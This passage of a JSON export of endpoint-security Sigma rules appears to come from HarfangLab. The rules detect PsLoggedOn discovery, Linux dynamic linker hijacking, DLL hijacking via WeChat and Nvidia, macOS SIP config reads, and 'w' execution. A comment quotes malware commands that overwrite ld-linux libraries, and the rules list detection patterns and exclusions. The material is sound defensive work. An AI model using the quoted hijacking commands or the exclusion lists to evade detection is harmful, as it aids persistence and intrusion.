"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.013"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e97354a2-fdfc-4d08-a1b2-6edae8abf311",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605037Z",
"creation_date": "2026-03-23T11:45:34.605040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605048Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_psloggedon.yml",
"content": "title: Logged-on Users Discovered via PsLoggedOn\nid: e97354a2-fdfc-4d08-a1b2-6edae8abf311\ndescription: |\n Detects the execution of the PsLoggedOn utility, part of the Sysinternals suite, which enumerates local and remote system logon sessions.\n While legitimate for administrative use, attackers often leverage this tool to identify logged-in users and backup accounts, aiding in lateral movement and privilege escalation.\n It is recommended to investigate PsLoggedOn execution context and scope, verify authorization of use, and correlate with other discovery activities.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/10/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\psloggedon.exe'\n - OriginalFileName: 'psloggedon.exe'\n condition: selection\nlevel: medium\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e97354a2-fdfc-4d08-a1b2-6edae8abf311",
"rule_name": "Logged-on Users Discovered via PsLoggedOn",
"rule_description": "Detects the execution of the PsLoggedOn utility, part of the Sysinternals suite, which enumerates local and remote system logon sessions.\nWhile legitimate for administrative use, attackers often leverage this tool to identify logged-in users and backup accounts, aiding in lateral movement and privilege escalation.\nIt is recommended to investigate PsLoggedOn execution context and scope, verify authorization of use, and correlate with other discovery activities.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9b08d80-18f6-45d9-b8c0-c09b284e842c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622202Z",
"creation_date": "2026-03-23T11:45:34.622204Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622208Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/",
"https://attack.mitre.org/techniques/T1574/006/"
],
"name": "t1574_006_possible_dynamic_linked_highjacking.yml",
"content": "title: Dynamic Linker Possibly Hijacked\nid: e9b08d80-18f6-45d9-b8c0-c09b284e842c\ndescription: |\n Detects the suspicious execution of commands related to dynamic linker hijacking.\n Dynamic linker hijacking is a technique used to achieve persistence and execution by tampering with dynamically loaded libraries.\n This method has already been used by the Orbit backdoor in a July 2022 campaign, allowing it to hook system calls in order to hide its files, network connections and other artifacts.\n It is recommended to investigate the command-line, the file being copied, and the execution context to determine if this action was legitimate.\nreferences:\n - https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/\n - https://attack.mitre.org/techniques/T1574/006/\ndate: 2022/07/11\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Hijacking\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # cp -p XXX ld-linux*.so.2\n # cp -p ld-linux*.so.2 XXX\n # mv XXX ld-linux*.so.2\n # mv ld-linux*.so.2 XXX\n selection_bin:\n Image|endswith:\n - '/mv'\n - '/cp'\n - '/cat'\n\n selection_cmd:\n CommandLine|contains:\n - 'ld-linux-x86-64.so.2'\n - 'ld-linux.so.2'\n\n exclusion_initramfs:\n # cp --sparse=always -pfL /lib64/ld-linux-x86-64.so.2 /var/tmp/dracut.LwaqEu/initramfs//lib64/ld-linux-x86-64.so.2\n # cp --reflink=auto --sparse=auto --preserve=mode,xattr,timestamps -fL /lib64/ld-linux-x86-64.so.2 /var/tmp/dracut.LwaqEu/initramfs/lib64/ld-linux-x86-64.so.2\n # cp -pP /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /var/tmp/mkinitramfs_CJIkzz//usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\n CommandLine|contains:\n - ' /var/tmp/dracut.*/initramfs/'\n - '/temp/dracut.*/initramfs/'\n - ' /var/tmp/mkinitramfs_*/'\n - ' /tmp/tmp.*/mkinitramfs_*/'\n - ' /run/initramfs/'\n\n exclusion_distupgrade:\n # apt-get dist-upgrade\n # cp --no-dereference --preserve=all --reflink=auto --sparse=always /lib64/ld-linux-x86-64.so.2 /usr/lib64/ld-linux-x86-64.so.2\n ParentCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_mkinitcpio:\n - ParentCommandLine|startswith: 'bash /usr/bin/mkinitcpio -k '\n - GrandparentCommandLine:\n - 'bash /usr/bin/mkinitcpio -p linux'\n - 'bash /usr/bin/mkinitcpio -P'\n\n exclusion_mkchroot:\n ParentCommandLine|startswith:\n - '/bin/bash /bin/mkchroot '\n - '/bin/bash /usr/bin/mkchroot '\n - '/bin/bash /usr/local/bin/mkchroot '\n\n exclusion_mkinitrd:\n ParentCommandLine|startswith: '/bin/sh /usr/sbin/mkinitrd '\n\n exclusion_gentoo_glibc:\n GrandparentImage:\n - '/usr/bin/gmake'\n - '/usr/bin/make'\n GrandparentCommandLine|contains: '/var/tmp/portage/sys-libs/glibc-*/work/glibc-* '\n\n exclusion_container:\n ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_dpkg:\n ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_rear:\n ProcessParentCommandLine:\n - '/bin/bash /usr/sbin/rear mkbackup'\n - '/bin/bash -* /usr/sbin/rear mkbackup'\n\n exclusion_make:\n ProcessImage: '/usr/bin/mv'\n ProcessParentImage: '/usr/bin/make'\n\n exclusion_dracut:\n ProcessParentImage: '/usr/lib/dracut/dracut-install'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9b08d80-18f6-45d9-b8c0-c09b284e842c",
"rule_name": "Dynamic Linker Possibly Hijacked",
"rule_description": "Detects the suspicious execution of commands related to dynamic linker hijacking.\nDynamic linker hijacking is a technique used to achieve persistence and execution by tampering with dynamically loaded libraries.\nThis method has already been used by the Orbit backdoor in a July 2022 campaign, allowing it to hook system calls in order to hide its files, network connections and other artifacts.\nIt is recommended to investigate the command-line, the file being copied, and the execution context to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2026-01-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9b31c16-7433-4a48-bc59-19fd250d5a09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075724Z",
"creation_date": "2026-03-23T11:45:34.075726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075730Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wechat.yml",
"content": "title: DLL Hijacking via WeChat.exe\nid: e9b31c16-7433-4a48-bc59-19fd250d5a09\ndescription: |\n Detects potential Windows DLL Hijacking via WeChat.exe related to Coc Coc Browser Update Software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessProduct: 'WeChat'\n ProcessDescription: 'WeChat'\n ProcessCompany: 'Tencent'\n ImageLoaded|endswith: '\\WeChatWin.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Tencent\\WeChat\\'\n - '?:\\Program Files (x86)\\Tencent\\WeChat\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Tencent\\WeChat\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Tencent\\WeChat\\'\n - '?:\\Program Files (x86)\\Tencent\\WeChat\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Tencent\\WeChat\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Tencent Technology(Shenzhen) Company Limited'\n # 390f6e7c2bf17b861ec245e57d0a876abcde8f3b028004fb0ad9d371d71049ff\n - 'Tencent Technology (Shenzhen) Company Limited'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9b31c16-7433-4a48-bc59-19fd250d5a09",
"rule_name": "DLL Hijacking via WeChat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WeChat.exe related to Coc Coc Browser Update Software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9b7db41-b51f-401a-be74-71189416dc78",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.614902Z",
"creation_date": "2026-03-23T11:45:34.614905Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.614913Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip",
"https://attack.mitre.org/techniques/T1543/"
],
"name": "t1543_rootless_conf_read.yml",
"content": "title: Suspicious Read Access to Rootless Configuration File\nid: e9b7db41-b51f-401a-be74-71189416dc78\ndescription: |\n Detects a suspicious access to the rootless configuration file which holds the monitored paths protected from being modified or deleted by the System Integrity Protection (SIP) feature.\n Adversaries may use files present in the rootless configuration file but not present in the filesystem to establish a persistence protected from deletion by the SIP.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip\n - https://attack.mitre.org/techniques/T1543/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Path: '/System/Library/Sandbox/rootless.conf'\n Kind: 'read'\n ProcessImage|contains: '?'\n\n filter_csrutil:\n Image: '/usr/bin/csrutil'\n\n filter_installer:\n ProcessImage: '/usr/sbin/installer'\n\n filter_update:\n - Image: '/private/var/db/com.apple.xpc.roleaccountd.staging/*.*.xpc/Contents/MacOS/com.apple.MobileSoftwareUpdate.UpdateBrainService'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.MobileSoftwareUpdate.UpdateBrainService'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_acronis:\n Image: '/Applications/Acronis True Image.app/Contents/MacOS/escyberprotect.app/Contents/MacOS/escyberprotect'\n\n exclusion_image:\n ProcessImage:\n - '/sbin/md5'\n - '/usr/bin/rsync'\n - '/opt/homebrew/Cellar/rsync/*/bin/rsync'\n - '/Users/*/Applications/*/ripgrep/bin/rg'\n - '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9b7db41-b51f-401a-be74-71189416dc78",
"rule_name": "Suspicious Read Access to Rootless Configuration File",
"rule_description": "Detects a suspicious access to the rootless configuration file which holds the monitored paths protected from being modified or deleted by the System Integrity Protection (SIP) feature.\nAdversaries may use files present in the rootless configuration file but not present in the filesystem to establish a persistence protected from deletion by the SIP.\nIt is recommended to verify if the process performing the read operation has legitimate reason to do it.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9cfaccc-7059-4782-b19c-b4274fa93697",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295642Z",
"creation_date": "2026-03-23T11:45:35.295645Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295651Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/w.1.html",
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_w_linux.yml",
"content": "title: W Execution\nid: e9cfaccc-7059-4782-b19c-b4274fa93697\ndescription: |\n Detects the execution of the \"w\" command.\n Attackers may use \"w\" during the discovery phase to retrieve the list of users currently logged on and their last action on the system.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man1/w.1.html\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/12/23\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1049\n - attack.t1087.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/w'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/bin/run-parts|'\n - '|/usr/sbin/crond|'\n\n exclusion_update_motd:\n # /bin/sh /etc/update-motd.d/17-users\n ParentCommandLine|startswith: '/bin/sh /etc/update-motd.d/'\n\n exclusion_cinnamon_screensaver:\n ParentImage: '/usr/bin/python3.*'\n ParentCommandLine:\n - '/usr/bin/python3 /usr/bin/cinnamon-screensaver'\n - '/usr/bin/python3 /usr/share/cinnamon-screensaver/cinnamon-screensaver-main.py'\n\n exclusion_cohesity:\n GrandparentCommandLine|contains: '/opt/cohesity/agent/software/crux/bin/'\n\n exclusion_udevadm:\n Ancestors|endswith: '|/usr/bin/udevadm|/usr/lib/systemd/systemd'\n\n exclusion_x11vnc:\n Ancestors|endswith: '|/usr/bin/x11vnc|/usr/lib/systemd/systemd'\n\n exclusion_nagios:\n - ParentImage: '/usr/sbin/nrpe'\n - Ancestors|contains: '|/usr/sbin/nrpe|'\n - CurrentDirectory: '/usr/nagios/plugins/'\n\n # 760503f9eeb84437f5debd416e38577eb14499a32d94e154dff016f13e55297f\n exclusion_vxc:\n CommandLine|startswith: 'w -h'\n ParentCommandLine: '/bin/bash /usr/bin/vxc-init'\n\n exclusion_wapt:\n - ProcessParentImage: '/opt/wapt/wapt-get.bin'\n - ProcessAncestors|contains: '|/opt/wapt/wapt-get.bin|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9cfaccc-7059-4782-b19c-b4274fa93697",
"rule_name": "W Execution",
"rule_description": "Detects the execution of the \"w\" command.\nAttackers may use \"w\" during the discovery phase to retrieve the list of users currently logged on and their last action on the system.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1049",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9d4a930-394e-4a87-971c-3ff014c667b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618223Z",
"creation_date": "2026-03-23T11:45:34.618225Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nvidia.yml",
"content": "title: DLL Hijacking via Nvidia\nid: e9d4a930-394e-4a87-971c-3ff014c667b6\ndescription: |\n Detects a potential Windows DLL hijacking via Nvidia software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the Nvidia process.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/05/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessInternalName: 'NVIDIA Notification'\n ProcessProduct: 'NVIDIA Notification'\n ProcessCompany: 'NVIDIA Corporation'\n ProcessSigned: 'true'\n ProcessSignature: 'Nvidia Corporation'\n ImageLoaded|endswith: '\\libcef.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\NVIDIA Corporation\\'\n - '?:\\Program Files (x86)\\NVIDIA Corporation\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\NVIDIA Corporation\\'\n - '?:\\Program Files (x86)\\NVIDIA Corporation\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'NVIDIA Corporation'\n - 'NVIDIA Corporation PE Sign v2???'\n - 'NVIDIA Corporation-PE-Prod-Sha1'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9d4a930-394e-4a87-971c-3ff014c667b6",
"rule_name": "DLL Hijacking via Nvidia",
"rule_description": "Detects a potential Windows DLL hijacking via Nvidia software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the Nvidia process.\n",
"rule_creation_date": "2025-05-23",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9d731c0-0173-4196-8d31-3dd430a01429",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
